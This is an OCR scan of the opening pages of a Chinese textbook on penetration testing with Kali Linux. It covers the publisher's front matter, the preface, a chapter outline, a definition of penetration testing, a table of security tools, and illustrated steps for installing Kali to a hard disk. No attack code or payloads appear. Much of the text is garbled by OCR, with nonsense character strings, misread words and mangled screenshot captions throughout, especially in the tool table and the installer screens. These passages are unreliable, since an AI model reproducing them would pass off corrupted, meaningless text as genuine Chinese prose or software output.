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基于 最 为 流行 的 KaliLinux 系 统 ， 全 面 介 绍 了 渗透 测试 的 各 种 核心 技术 
涉及 渗透 测试 的 基础 知识 、 操 作 系统 、 网 络 协议 和 社会 工程 学 等 诸多 领域 
结合 Wireshark 等 工具 ， 以 直观 的 形式 由 表 及 里 地 展示 了 网 络 渗透 的 奥秘 
遵循 渗透 测试 的 基本 流程 ， 重 点 介绍 了 渗透 测试 的 4 个 大 环节 及 其 相关 技术 
注重 操作 ， 避 人 免 纯 理论 讲解 ， 让 读者 可 以 轻松 掌握 渗透 测试 的 实施 方法 
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本 书 由 浅 入 深 地 介绍 了 Kali Linux 的 各 种 渗透 测试 技术 。 书 中 选取 了 最 核心 和 最 基础 的 内 容 进 行 讲 
解 ， 让 读者 能 够 掌握 渗透 测试 的 流程 ， 而 不 会 被 高 难度 的 内 容 所 淹没 。 本 书 涉及 面 广 ， 从 基本 的 知识 介 
绍 、 安 装 及 配置 Kali Linux， 到 信息 收集 和 漏洞 扫描 及 利用 ， 上 再 到 权限 提升 及 各 种 渗透 测试 ， 均 有 涉及 。 

本 书 共 9 章 ， 分 为 3 简 。 第 1 篇 为 Linux 安全 渗透 测试 基础 ， 介 绍 了 Linux 安全 渗透 人 简介、 安装 及 配 
置 Kali Linux 操作 系统 、 配 置 目 标 测 试 系统 ， 第 2 篇 为 信息 的 收集 及 利用 ， 介 绍 了 信息 收集 、 漏 洞 扫描 、 
漏洞 利用 等 技术 ;第 3 篇 为 各 种 渗透 测试 ， 介 绍 了 权限 提升 、 密 人 码 攻 击 、 无 线 网 络 攻 击 、 渗 透 测试 等 
技术 。 

本 书 适合 使 用 Linux 各 个 层次 的 人 员 作 为 学 习 渗 透 测 试 技术 的 基础 读物 ， 也 适合 对 安全 、 渗透 感 兴趣 
的 人 、 网 络 管理 员 及 专门 从 事 搞 安 全 的 人 员 等 阅读 。 


本 书 封面 贴 有 清华 大 学 出 版 社 防伪 标签 ， 无 标签 者 不 得 销售 。 
版 权 所 有 ， 侵 权 必 究 。 侵 权 举 报 电话 : 010-62782989 13701121933 


图 书 在 版 编目 《CIP) 数据 


Kali Linux 渗透 测试 技术 详解 / 杨波 编著 . 一 北京 : 清华 大 学 出 版 社 ，2015 (2018.1 重印 ) 
ISBN 978-7-302-38964-4 


I. OK: Il. Of M. (Linux 操作 系统 IV. DTP316.89 


中 国 版 本 图 书馆 CIP 数据 核 字 (2015) 第 005625 号 


责任 编辑 : 杨 如 林 
封面 设计 : KIRJE 
责任 校对 : 徐 俊 伟 
责任 印 制 : Eni 


出 版 发 行 : 清华 大 学 出 版 社 
网 Hb: http://www.tup.com.cn, http://www.wqbook.com 
地 b 北京 清华 大 学 学 研 大 厦 A 座 BS 4%: 100084 
ib 总 机 : 010-62770175 HB WR: 010-62786544 
投稿 与 读者 服务 : 010-62776969, c-service@tup.tsinghua.edu.cn 
质 = 反 馈 : 010-62772015, zhiliang@tup.tsinghua.edu.cn 
ED 刷 者 : 北京 甸 丰 华 彩 印 有 限 公司 
装 订 者 三河 市 溧 源 装 订 厂 
经 销 : 全 国 新 华 书 店 


JF ”本 : 185mmX 260mm ED 5K: 2025 FZ 3 506 TF 

版 ” 次 : 2015 年 3 月 第 1 版 Ep X: 2018 年 1 月 第 6 次 印刷 
Ep #8: 11001~12500 

ce ff: 59.8070 


产品 编号 : 062966-01 


nii 


EDI 


由 于 网 络 的 使 用 越 来 越 广泛 ， 网 络 安全 问题 也 越 来 越 被 大 众 关 注 。 在 此 背景 下 ，Kali 
Linux 于 2013 年 发 布 。Kali Linux 的 前 身 为 网 络 安全 业界 知名 的 BackTrack. Kali Linux 集 
成 了 海量 的 渗透 测试 工具 ， 如 nmap. Wireshark, John the Ripper 和 Airecrack-ng 等 。 

渗透 测试 是 通过 模拟 恶意 黑客 的 攻击 方法 ， 来 评估 计算 机 网 络 系统 安全 的 一 种 评估 方 
法 。 这 个 过 程 包括 对 系统 的 任何 弱点 、 技 术 缺 陷 或 漏洞 的 主动 分 机 。 这 个 分 析 是 从 一 个 攻 
击 者 可 能 存在 的 位 置 来 进行 的 ， 并 且 从 这 个 位 置 有 条 件 主动 利用 安全 漏洞 。 

本 书 选取 了 Kali Linux 最 核心 和 最 基础 的 内 容 进 行 了 讲解 ， 让 读者 能 够 掌握 渗透 测试 
的 流程 ， 并 使 用 Wireshark 工具 ， 通 过 分 析 捕 获 的 数据 包 ， 详 细 介 绍 了 攻击 的 实现 方式 。 
学 习 完 本 书后 ， 谈 者 应 该 可 以 具备 独立 进行 一 些 基本 渗透 测试 的 能 


本 书 特 色 


1. 基于 最 新 的 渗透 测试 系统 Kali Linux 

BackTrack 曾 是 安全 领域 最 知名 的 测试 专用 Linux 系统 ， 但 是 由 于 其 已 经 停止 更 新 ， 
而 全 面 转向 Kali Linux, PA Kali 将 成 为 安全 人 士 的 不 二 选择 。 本 书 基 于 Kali Linux 来 展 
现 渗透 测试 的 各 项 内 容 。 

2. 内 容 难 度 适 当 

本 书 介 绍 了 Linux 安全 渗透 测试 的 基础 知识 及 操作 系统 、 网 络 协 议 、 社 会 工程 学 等 诸 
多 领域 ， 最 后 还 详细 介绍 了 各 种 渗透 测试 无 线 网 络 。 

3. 理论 和 操作 结合 讲解 

本 书 没有 枯燥 的 罗列 理论 ， 也 没有 一 味 的 讲解 操作 ， 而 是 将 两 者 结合 起 来 ， 让 读者 明 
白 测试 所 基于 的 理论 ， 以 及 从 中 衍生 出 的 测试 攻击 手段 。 这 样 ， 读 者 可 以 更 为 清楚 地 掌握 
书 中 的 内 容 。 

4. 更 直观 的 讲述 方式 

由 于 网 络 协 议 工作 在 底层 , 并 有 旦 渗透 工具 将 功能 封装 , 读者 很 难看 到 攻击 的 实现 方式 。 
为 了 让 谈 者 更 直观 的 理解 ， 本 书 采 用 Wireshark 抓 包 和 分 析 包 的 方式 ， 给 读者 展示 了 攻击 
过 程 中 实现 的 各 个 细节 。 这 样 ， 读 者 既 可 以 掌握 理论 ， 也 可 以 避免 成 为 只 会 使 用 工具 的 初 
级 技术 工 。 
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5. 提供 多 种 学 习 和 交流 的 方式 


为 了 方便 大 家 学 习 和 人 交流， 我 们 提供 了 多 种 方式 供 读者 交流 。 读 者 可 以 在 论坛 
www.wanjuanchina.net 上 发 帖 讨 论 ， 也 可 以 通过 QQ FF 336212690 转 入 对 应 的 技术 和 群 ， 还 
可 以 就 图 书 阅读 中 遇 到 的 问题 致 售 book@wanjuanchina.net 或 bookservice2008@163.com, 
以 获得 帮助 。 另 外 ， 本 书 涉 及 的 工具 也 可 以 在 论坛 的 相关 版 块 获取 。 


本 书 内 容 及 体系 结构 


第 1 篇 Linux 安全 渗透 测试 基础 〈 第 1 一 3 章 ) 


本 篇 主要 内 容 包 括 : Linux 安全 渗透 简介 、 配 置 Kali Linux 和 高 级 测试 实验 室 。 通 过 
本 篇 的 学 习 ， 读 者 可 以 了 解 安 全 渗透 测试 的 概念 及 所 需 的 工具 、 在 各 种 设备 上 安装 Kali 
Linux 操作 系统 、 配 置 目 标 系统 等 。 


第 2 篇 ”信息 的 收集 及 利用 《第 4 一 6 章 ) 


本 篇 主要 内 容 包 括 : 信息 收集 、 漏 洞 扫 描 和 漏洞 利用 等 。 通 过 本 篇 的 学 习 ， 读 者 可 以 
收集 大 量 目标 主机 的 信息 、 扫 描 目 标 主机 存在 的 漏洞 及 利用 这 些 漏洞 ， 为 后 续 渗 透 攻 击 做 
好 准备 。 

第 3 篇 ”各 种 渗透 测试 〈 第 7 一 9 章 ) 


Ai ERA ATG: 提升 用 户 权 限 、 密 码 攻 击 和 无 线 网 络 渗透 测试 等 。 通 过 本 篇 的 学 
习 ， 读 者 可 以 通过 提升 目 己 的 权限 ， 实 现 各 种 密码 攻击 ， 如 获取 目标 主机 上 各 种 服务 的 用 
户 名 、 密 码 和 无 线 网 络 的 登录 密码 等 。 


学 习 建议 


O 笃 握 基本 的 网 络 协议 。 通 第 攻击 目标 主机 ， 需 要 了 解 其 存在 的 漏洞 或 开放 的 端口 ， 
但 是 这 些 闪 口 都 对 应 有 一 个 网 络 协议 ， 了 解 对 应 的 网 络 协议 和 工作 机 制 ， 可 以 更 
好 地 收集 信息 和 寻找 漏洞 。 

O 一 定 要 有 耐心。 渗透 测试 往往 需要 花费 大 量 的 时 间 ， 例 如 通 妆 在 破解 密码 时 ， 如 
果 没 有 一 个 很 好 的 密码 字典 ， 会 需要 儿 个 小 时 、 甚 至 几 天 的 时 间 。 再 比如 要 抓 取 
理想 的 数据 包 ， 人 往往 需 要 长 时 间 的 等 竺 ， 然 后 从 海量 数据 包 中 寻找 需要 的 信息 。 


本 书 读者 对 象 
口 Linux 初学 者 ; 


O 想 成 为 安全 渗透 测试 人 员 ; 
口 渗透 测试 兴趣 爱好 者 ; 


z 
Lilt 


AEREE 
O 专业 的 安全 渗透 测试 人 员 ; 
O 大 中 专 院 校 的 学 生 ; 
口 社会 培训 班 学 员 ; 
口 需要 一 本 案头 必 备 手册 的 程序 员 。 
本 书 作者 


本 书 主要 由 兰州 文理 学 院 电 子 信息 工程 学 院 的 杨波 主笔 编写 。 其 他 参与 编写 的 人 员 有 
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阅读 本 书 的 过 程 中 奋 有 任何 疑问 ， 都 可 以 发 邮件 或 者 在 论坛 和 QQ 群 里 提问 ， 会 有 专 
人 为 您 解答 。 最 后 顺 祝 各 位 读者 读书 快乐 ! 
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ARMAREN a Te. I RST ERT EAI EL. FRR A 
JL ZR A ZR EEE PR A WR ARR. AN OS fj ESP ZA Linux 
安全 渗透 及 安全 渗透 工具 的 相关 内 容 。 其 主要 知识 点 如 下 : 
什么 是 安全 渗透 ; 
安全 渗透 所 需 的 工具 ; 
Kali Linux 简介; 
安装 Kali Linux; 
Kali 更 新 与 升级 ; 
基本 设置 。 
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ll 什么 是 安全 渗透 


渗透 测试 并 没有 一 个 标准 的 定义 。 国 外 一 些 安全 组 织 达 成 共识 的 通用 说 法 是 ， 渗 透 测 
试 是 通过 模拟 恶意 黑客 的 攻击 方法 ， 来 评 佑 计算 机 网 络 系统 安全 的 一 种 评 佑 方法， 这 个 过 
程 包括 对 系统 的 任何 弦 点 、 技 术 缺 陷 或 漏洞 的 主动 分 析 。 这 个 分 析 是 从 一 个 攻击 者 可 能 存 
在 的 位 置 来 进行 的 ， 并 且 从 这 个 位 置 有 条 件 主动 利用 安全 漏洞 。 

渗透 测试 与 其 他 评 佑 方法 不 同 。 通 利 的 评估 方法 是 根据 已 知 信息 资源 或 其 他 农 评 佑 对 
象 ， 去 发 现 所 有 相关 的 安全 问题 。 渗 透 测试 是 根据 已 知 可 利用 的 安全 漏洞 ， 去 发 现 是 否 存 


在 相应 的 信息 资源 。 相 比较 而 言 ， 通 利 评 佑 方法 对 评 佑 结果 更 具有 全 面 性 ， 而 渗透 测试 更 
注重 安全 漏洞 的 严重 性 。 
渗透 测试 有 黑 盒 和 白 盒 两 种 测试 方法 。 黑 盒 测试 是 指 在 对 基础 设施 不 知情 的 情况 下 进 


行 测试 。 白 盒 测试 是 指 在 完全 了 解 结 构 的 情况 下 进行 测试 。 不 论 测试 方法 是 否 相 同 ， 渗 透 
测试 通常 具有 两 个 显 者 特 扩 : 

口 渗透 测试 是 一 个 渐进 的 且 逐 步 深入 的 过 程 。 

CL 渗 远 测试 是 选择 不 影响 业务 系统 正常 运行 的 攻击 方法 进行 的 测试 。 


12 ”安全 渗透 所 需 的 工具 


了 解 了 渗透 测试 的 概念 后 ， 接 下 来 束 要 学 习 进行 渗透 测试 所 使 用 的 各 种 工具 。 在 做 渗 
透 测 试 之 前 ， 需 要 先 了 解 渗透 所 需 的 工具 。 渗 透 测 试 所 需 的 工具 如 表 1-1 所 示 。 
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表 1-1 渗透 所 需 的 工具 


splint serub 
pscan ht 
flawfinder [o sm | driftnet 
rats binwalk 
ET Scalpel 
eparted paferack 
testdisk wipe 
foremost safecopy 
sectool-gui hfsutils 
unhide cmospwd 
examiner secuirty-menus 
= "T 
nwipe me 
firstaidkit-gui screen 
net-snmp openvas-scanner 
hexedit rkhunter 
irssi labrea 
powertop nebula 
ur tipwir 
nano prelude“ 
vin-enhanced op 
weet scamper 
yum-utils iptraf-ng 
mcabber iperf 
firstaidkit-plugin-all nethogs 
vnstat uperf 
ircrackng nload 
kismet ee | on 
weplab wavemon 


Hid SED], KERA TRL. 8350 ADT TS TJ LH. nT EA TE $e P Linux 操作 
系统 中 找到 ， 然 后 手动 安装 这 些 工 具 。 由 于 工具 繁杂 ， 安 装 这 些 工 具 ， 会 变 成 一 个 浩大 的 
工程 。 为 了 方便 用 户 进 行 渗透 方面 的 工作 ， 有 人 将 所 有 的 工具 都 预 狼 在 一 个 Linux 系统 。 
其 中 ， 典 型 的 操作 系统 就 是 本 书 所 使 用 的 Kali Linux. 

该 系统 主要 用 于 渗透 测试 。 它 预 装 了 许多 渗透 测试 软件 ， 包 括 nmap Mig A AAs 
Wireshark (数据 包 分 析 器 ) ~ John the Ripper CWIK) 及 Aircrack-ng〈 一 套用 于 对 无 
线 局 域 网 进行 渗透 测试 的 软件 )。 用 户 可 通过 便 盘 、Live CD 或 Live USB 来 运行 Kali Linux. 


1.3 Kali Linux 简介 


Kali Linux 的 六 上身 是 BackTrack Linux 发 行 版 。Kali Linux 是 一 个 基于 Debian 的 Linux 


e。 3 。 
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发 行 版 ,包括 很 多 安全 和 取证 方面 的 相关 工具 。 它 由 Offensive Security Ltd 维护 和 资助 ， 
最 先 由 Offensive Security 的 MatiAharoni 和 Devon Kearns 通过 重 写 Back Track 来 完成 .Back 
Track 是 基于 Ubuntu 的 一 个 Linux 发 行 版 。 

Kali Linux 有 32 位 和 64 位 的 镜像 ， 可 用 于 x86 指令 集 。 同 时 它 还 有 基于 ARM 架构 的 
BUZ. FY A ERA = ALAN ARM Chromebook。 用 户 可 通过 硬盘 、Live CD =k Live USB 
来 运行 Kali Linux 操作 系统 。 


1.4 22 Kali Linux 


WS Linux 的 安装 过 程 已 经 非常 “傻瓜 ”化 ， 只 需要 轻 点 几 下 鼠标 ， 就 能 够 完成 整个 
系统 的 安装 。Kali Linux 操作 系统 的 安装 也 非常 简单 。 本 节 将 分 别 介绍 安装 Kali Linux 至 便 
Ai. USB 驱动 器 、 树 每 派 、VMWware Workstation 和 Womuare Tods 的 详细 过 程 。 
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安装 到 硬盘 是 最 基本 的 操作 之 一 。 该 工作 的 实现 可 以 让 用 户 不 使 用 DVD,， 而 正常 的 运 
行 Kali Linux。 在 安装 这 个 全 新 的 操作 系统 之 前 ， 需 要 做 一 些 准备 工作 。 例 如 ， 从 哪里 得 
到 Linux? 对 电脑 配置 有 什么 要 求 ? .… 下 面 将 逐一 列 出 这 些 要 求 。 
Q Kali Linux 安装 的 磁盘 空间 的 最 小 值 是 8GB。 为 了 便于 使 用 ， 这 里 推荐 至 少 25GB 
去 保存 附加 程序 和 文件 。 
口 内 存 最 好 为 S12MB UE. 
口 Kali Linux 的 下 载 地 址 http://www.kali.org/downloads/， 下 载 界面 如 图 1.1 所 示 。 


> Kali Linux 1.0.6 64 Bit ISO 281ddb3d 146 19a973e254b81484b/fe27defa822 


> Kali Linux 1.0.6 64 Bit Torrent 281ddb3d14619a973e254b81484b71e27 defa822 


> Kali Linux 1.0.6 64 Bit Mini ISO - d859cc2798a24c48ddd37c6aafd88c5dc5e65e123 


> Kali Linux 1.0.6 32 Bit ISO - 518aad75c2c5f1c60b20687607 1217e82c02d703 


> Kali Linux 1.0.6 32 Bit Torrent - 5188a475c2c511c60b206876071217e82c024703 
> Kali Linux 1.0.6 32 Bit Mini ISO - 8bf00925c77ba574e01b51576119e1be647e4b2e 


图 1.1 Fa Kali Linux 界面 


该 官方 网 站 提供 了 32 位 和 64 位 ISO 文件 。 本 书 中 以 32 位 为 例 来 讲解 安装 和 使 用 。 
下 载 完 ISO 文件 后 ,将 该 映像 文件 刻录 到 一 张 DVD 光盘 上 。 接 下 来 就 可 以 看 手 将 KaliLinux 
安装 至 便 盘 中 了 。 


e4e 
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CLK BCH DVD 插入 到 用 户 计 算 机 的 光驱 中 ， 重 新 局 动 系统 ， 将 看 到 如 图 1.2 
所 示 的 界面 。 


RAVIPINUR 


Boot menu 


Live (6585-pae) 

Live (686-pae failsafe) 
Live (forensic mode) 
Install 

Graphical install 


Install with speech synthesis 


Press ENTER to boot or TAB to edit a menu entry 


图 1.2 ”局 动 界 面 


(2) 该 界面 是 Kali 的 引导 界面 ， 在 该 界面 选择 安 狠 方式 。 这 里 选择 Graphical Install 
(ABA Me) ， 将 显示 如 图 1.3 所 示 的 界面 。 


Select a language 


Choose the language to be used for the installation process. The selected language will also be the 
default language for the installed system. 


Language: 

Chinese (Traditional) -  "x(s8) 
Croatian - Hrvatski 
Czech - Čeština 
Danish - Dansk 
Dutch k - Nederlands 
Dzongkha - Én 

English - English 
Esperanto - Esperanto 
Estonian - Eesti 
Finnish - Suomi 
French - Francais 
Galician - Galego 
Georgian - o6o3eco 
German - Deutsch 
Graak - o FAlewnux lv] 


| Screenshot Go Back Continue | 


图 1.3 选择 语言 


(3) 在 该 界面 选择 安装 系统 的 默认 语言 为 Chinese (Simplified) ， 然 后 单 击 Continue 
按钮 ， 将 显示 如 图 1.4 所 示 的 界面 。 
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MARGIER : 


TEFERSDCISERT CF TEE 8) T D EUR CC OSEE Bh ERRAR. XR PCI TAS E NR., 


这 是 根据 您 所 选择 的 语 理 产生 的 短 列 表 。 如 果 没 有 列 出 您 的 区 域 . 请 选择 "其 他 "。 

BK, SHAR : 

p 
| 台湾 

新 加 坡 

ae 

其 它 /other 


EIN = 
图 1.4 选择 您 的 区 域 


(4) 在 该 界面 选择 区 域 为 “中 国 ”， 然 后 单 击 “继续 ”按钮 ， 将 显示 如 图 IS 所 示 的 
Fr ml o 


配置 键盘 


AIS RH : 

FDMIFTIB-TE ] L 

波斯 尼 亚 语 

巴西 
英国 英语 

保加利亚 语 

保加利亚 语 (phonetic 75/8) 

加 拿 大 法 语 

加 拿 大 -多 语 富 

WRF Elie 


EF MEA 
捷克 请 
丹麦 语 
荷兰 请 

多 上 冉 柯 键 瘟 (Dvorak) 
不 丹 语 

世界 语 

爱沙尼亚 语 
埃塞俄比亚 语 


图 1.5 配置 键盘 
(5) 在 该 界面 选择 键盘 模式 为 “汉语 ”， 然 后 单 击 “继续 ”按钮 ， 将 显示 如 图 1.6 所 
示 的 界面 。 


(6) 该 界面 用 来 设置 系统 的 主机 名 ， 这 里 使 用 默认 的 主机 名 Kali (用户 也 可 以 输入 日 
己 系统 的 名 字 ) 。 然 后 单 击 “继续 ”按钮 ， 将 显示 如 图 1.7 所 示 的 界面 。 


ee 
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配置 网 络 


请 输入 系统 的 主机 名 。 


者 批 名 是 在 网 络 中 标示 您 的 系统 的 一 个 单词 如 果 您 不 知道 主机 名 是 什么 ， 请 询问 网 络 管理 员 。 如 果 您 正在 设置 内 部 网 络 ， 那 么 可 以 随意 写 个 
FHA: 


RERE | am J[ se | 


图 1.6 配置 网 络 


配置 网 络 


域名 是 您 的 互联 网 地 址 的 一 部 分 ， 附 加 在 主机 名 之 后 。 它 通常 是 以 .com、.net、.edu 或 .org 结尾。 如果 您 正在 设置 一 个 内 部 了 网络， 您 可 
以 随意 写 一 个 ,但 是 要 确保 您 所 有 计算 机 的 域名 都 是 一 样 的 。 
n: 


kali.secureworks.com 


返回 m 
图 1.7 配置 网 络 


CD 该 界面 用 来 设置 计算 机 所 使 用 的 域名 ,本 例 中 输入 的 域名 为 kali.secureworks.com。 
如 果 当 前 计算 机 没有 连接 到 网 络 的 话 ， 可 以 不 用 填写 域名 ， 直 接 单 击 “继续 ”按钮 ， 将 显 
示 如 图 1.8 所 示 的 界面 。 


设置 用 户 和 密码 


您 需要 为 “root” 用 户 ( 即 系统 管理 员 帐 号 ) 设置 一 个 密码 。 如 果 亚 意 或 无 窗 格 的 用 户 获得 了 root 权限 担 可 能 会 导致 灾难 性 的 结果 .因此 您 应 
该 小 心 赐 选择 一 个 不 容易 菇 出 的 root 密码 。 它 不 应 该 是 一 个 能 在 字典 中 找 得 到 的 单词 或 者 一 个 归 您 本 人 有 紧密 关 采 的 词语 。 


一 个 安全 的 密码 应 该 是 由 字母 、 数 字 和 标点 符号 组 合 而 成 ， 而 且 要 定期 更 新 。 
根 用 户 不 应 使 用 空 密码 。 如 果 您 业 此 留 空 ， 根 用 户 账 户 会 被 禁用 且 肥 统 的 初始 用 户 账户 会 被 给 予 权限 通过 “sudo” 命 倒 获 得 根 用 户 权限 。 


请 注意 ， 您 将 不 会 看 到 所 输入 的 密码 内 容 。 
Root u^ ES : 


为 了 保证 您 的 密码 正确 无 误 . 请 再 次 输入 相同 的 root 密码 。 
ERMA BS DS? EX EE : 


| RERE 返回 L. id 
图 1.8 设置 用 户 和 密 公 


第 1 篇 Linux 安全 渗透 测试 基础 


(8 六 在 该 界面 设置 root HPA, Ala it “Ake” Fee, KR AGUA 1.9 所 示 的 
Jr o 


磁盘 分 区 


ee ee 如 果 您 喜欢 ， 您 也 可 以 手动 操作 。 如 有 果 选 择 了 分 区 向 导 ， 稍 后 您 还 是 有 机 会 检查 和 修改 
V =A Ko 


(15g E REB FRU ISHSR TRE RATA. FHSAA eR. 
分 区 方法 : 


AF - PAS i 


niu 


AS - 使 用 整个 在 总 并 配置 LVM 


AS - SAS ea eam ee LVM 
手动 


| 屏幕 截图 | aa |f qs | 
图 1.9 ”磁盘 分 区 
(9) 该 界面 供用 户 选 择 分 区 。 这 里 选择 “使 用 整个 做 盘 ”， 然 后 单 击 “ 继 续 ” 鬼 钮 ， 
将 显示 如 图 1.10 所 示 的 界面 。 


磁盘 分 区 


注意 您 所 选择 的 本 和 盖 上 的 全 部 致 捐 都 司 会 被 删除 ， 但 是 您 还 有 确认 是 真 的 要 做 这 些 改 动 的 机 会 。 
AIER DERIER : 


| SCSI3 (0,0,0) (sda) - 85.9 GB VMware, VMware Virtual S 


图 1.10 磁盘 分 区 


(10) AFP HK FE OP LK tt KARA A CEU a a EEH RA 
MAAT. a de “ARE” Fea, AeA 1.11 所 示 的 界面 。 

(11) 该 界面 要 求 选 择 分 区 方案 ， 上 默认 提供 了 三 种 方案 。 这 里 选择 “将 所 有 文件 放 
在 同一 个 分 区 中 《推荐 新 手 使 用 ) ”， 然 后 单 击 “ 继 续 ” 投 钮 ， 将 显示 如 图 1.12 所 示 的 
FIR. 
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磁盘 分 区 


已 选择 要 分 区 : 
SCSI3 (0,0,0) (sda) - VMware, VMware Virtual S: 85.9 GB 


对 此 磅 站 可 以 使 用 多 种 不 同 的 方案 进行 分 区 。 如 果 您 不 太 确 定 ， 请 选择 第 一 方案 。 
分 区 方案 : 


LE 枉 所 有 文件 放 在 同一 个 分 区 中 (推荐 新 手 使 用 ) 


将 /home 放 在 单独 的 分 区 
将 /home, /usr, /var &1/tmp 都 分 别 放 在 单独 的 分 区 


| RARE | | xm || gs 


图 1.11 已 选择 要 分 区 


磁盘 分 区 


芝 是 您 月 天 已 配置 的 分 区 积 持 载 点 的 综合 信息 。 WEIST OX DE RE (XART, ERa. BOEIREOHSHEEBISEBDBISEITNMX. X 
或 进 理 一 个 设备 以 初始 化 其 分 区 表 。 


分 区 向 导 

软件 RAID iz8 
MEcSHESES 
配置 加 密 郑 


一 SCSI3 (0,0,0) (sda) - 85.9 GB VMware, VMware Virtual S 


> #1 En 82.4 GB f ext4 / R 
> #5 ENR  3.5GB f swap swap 


撤消 对 分 区 设置 的 修改 
PEE RRHH ARA 


图 1.12 磁盘 分 区 


(12) 在 该 界 选择 “分 区 设 定 结束 并 将 修改 写 入 磁盘 ”， 然 后 单 击 “ 继 续 ” 按 钮 ， 将 
显示 如 图 1.13 所 示 的 界面 。 如 果 想 要 修改 分 区 ， 可 以 在 该 界面 选择 “撤消 对 分 区 设置 的 修 

(13) 在 该 界面 选择 “是 ” 复 选 枉 ， 然 后 单 击 “ 继 续 ” 按 钮 ， 将 显示 如 图 1.14 所 示 的 
界面 。 
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磁盘 分 区 


如 有 果 您 继续 .以 下 所 列 出 的 修改 内 容 杠 被 写 入 磁 瘟 。 理 则 您 即 可 以 进行 进一步 的 手动 修改 。 


以 下 设备 的 分 区 表 已 被 改变 ; 
SCSI3 (0,0,0) (sda) 
BUF A1 S t IE : 


SCSI3 (0,0,0) (sda) 设备 上 的 第 1 JRE ext4 
SCSI3 (0,0,0) (sda) 设备 上 的 第 5 分 区 将 被 设置 为 swap 
Noe 5 A BGB ? 


图 1.13 磁盘 分 区 


安装 采 统 


a 正在 安装 采 统 .… 
EOR BIRK HRIBA.. 


图 1.14 安装 系统 
(14) 现在 就 开始 安装 系统 了 。 在 安装 过 程 中 需要 设置 一 些 信 息 ， 如 设置 网 络 镜像 ， 
如 图 1.15 所 示 。 如 果 安 装 Kali Linux 系统 的 计算 机 没有 连接 到 网 络 的 话 ， 在 该 界面 选择 
“人 否 ” 复 选 枉 ， 然 后 单 击 “ 继 续 ” 按 钮 。 这 里 选择 “是 ” 复 选 枉 ， 将 显示 如 图 1.16 所 示 的 
界面 。 


配置 软件 包 管理 器 


配置 软件 包 管理 器 


网 络 镜像 可 以 用 来 补充 光盘 所 带 的 软件 . 也 可 以 用 来 提供 较 新 版 本 的 软件 。 


如 果 您 需要 用 HTTP 代理 来 连接 外 部 网 络 。 请 在 这 里 输入 代理 的 信息 。 否 则 ， 请 植 空 。 
SB FEAL BY ? (e B rte http://IUS ^ JE i919]: 6L: t C" RS E ERR 
» HTTP 代 至 信息 (如果 没有 请 吾 到 : 


屏幕 截图 返回 | 继续 | BERE 


图 1.15 置 软件 包 管 理 器 图 1.16 设置 HTTP 代理 


e. ]0 ° 
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(159 在 该 界面 设置 HTTP 代理 的 信息 。 如 果 不 需 要 通过 HTTP 代理 来 连接 到 外 部 网 
络 的 话 ， 直 接 单 击 “ 继 续 ” 按 钮 ， 将 显示 如 图 1.17 所 示 的 界面 。 


配置 软件 包 管理 器 


FF7FFFFFFFFF ero 


IEEE ISSA eR... 


NL. 


图 1.17 扫描 镜像 站 点 


(16) 扫 摘 镜像 站 点 完成 后 ， 将 显示 如 网 1.18 所 示 的 界面 。 


配置 软件 包 管理 器 


此 选项 的 目的 是 找到 网 络 上 高 您 最 近 的 镜像 -- 请 注意 .您 的 分 国 . 其 至 您 自己 的 国家 . 都 不 一 定 是 最 好 的 选择 。 
Debian "3PHEISPITTEBUEN S. : 


委内瑞拉 
乌兹别克 斯 坦 
乌克兰 

希腊 

西班牙 

香港 

新 加 坡 

新 喀 里 多 尼 亚 
新 西 兰 
匈牙利 
以 色 列 
意大利 

印度 

印度 尼 西 亚 
英国 

越南 

iE Ui 


四 


| ”屏幕 截图 | | 返回 | 继续 


图 1.18 镜像 所 在 的 国家 


(17) 在 该 界面 选择 镜像 所 在 的 国家 ， 这 里 选择 “中 国 ”， 然 后 单 击 “继续 ”按钮 ， 
将 显示 如 图 1.19 所 示 的 界面 。 

(18) 该 界面 默认 提供 了 7 个 镜像 站 点 ， 这 里 选择 一 个 作为 本 系统 的 镜像 站 点 。 这 里 
选择 mirrors.163.com， 然 后 单 击 “继续 ”按钮 ， 将 显示 如 图 1.20 所 示 的 界面 。 


elle 
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配置 软件 包 管理 器 


k 
请 选择 一 个 Debian 归档 镜像 。 如 果 您 不 知道 哪个 镜像 与 您 之 同 的 网 络 连 接 最 好 .请 使 用 位 于 您 的 国家 或 地 区 的 镜像 。 


通常 ,化 p.< 您 的 国家 代码 >.debian.org 会 是 一 个 较 好 的 选择 (本 软件 发 布 时 .中国 的 相应 站 点 尚 在 筹建 当中 ， 如 果 您 无 法 正常 连接 该 服务 
ss. 请 使 用 其 它 锐 像 ) 。 


Debian 3156 é : 


mirrorslicm 
ftp.cn.debian.org 


debian.ustc.edu.cn 
cdn.debian.net 
www. anheng.com.cn 
debian. bjtu.edu.cn 


mirrors.sohu.com 


| ARBRE | 返回 4k 


图 1.19 选择 镜像 


% GRUB £X X 


Foto ee 如 果 的 确 如 此 ， 您 应 该 可 以 安全 地 将 GRUB 启动 引导 器 安装 到 第 一 硬 功 的 主 引 导 记 录 
MBR) 上 。 


Eus: 如 果 安 装 程序 无 法 在 您 的 计算 机 上 探 简 到 已 存在 的 其 它 操作 和 采 统 ,修改 主 引 导 记 录 动 作 和 暂时 将 使 该 操作 和 双 统 无 法 启动 。 但 是 ,您 可 以 稍 
后 再 手动 设置 GRUB 以 启动 它 。 


N GRUB 局 动 引 导 器 安装 到 王 引 1 导 记 录 (MBR) B? 


"mM 


图 1.20 将 GRUB 启动 引导 器 安装 到 主 引 导 记 录 CMBR) 上 吗 


e. ]?2 œ 
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(19) 在 该 界面 选择 “是 ” 复 选 枉 ， 然 后 单 击 “ 继 续 ” 投 钮 ， 将 显示 如 图 1.21 所 示 的 
Jr o 


S GRUB £KZWiZ 


= GRUB S7558 


EZT "update-grub" ... 


图 121 将 GRUB 安装 至 硬盘 


(200 ERIT, AUR ERUE RI, Tin uk 1.22 所 示 的 界面 。 


结束 安装 进程 


RTH 
ee 该 是 重启 进入 您 的 新 系统 的 时 候 了 。 请 确认 已 经 取出 了 安装 介质 (光盘 ， 软 瘟 ) ， 以 使 您 能 够 启动 到 新 柔 统 而 非 重 
开 o 


| RERA | | 返回 | qe 


图 1.22 ”结束 安装 进程 


(21) EAA mad; “ARE” TL. ARP ARR. BRM, easy 


14.2 ”安装 至 USB 驱动 器 


Kali Linux USB 驱动 堪 提 供 了 一 种 能 力 , 它 能 永久 的 保存 系统 设置 `. 永 人 更 新 及 在 USB 
设备 上 安装 软件 包 ， 并 且 人 允许 用 户 运 行 上 自己 个 性 化 的 Kali Linux。 在 Win32 RAAE 
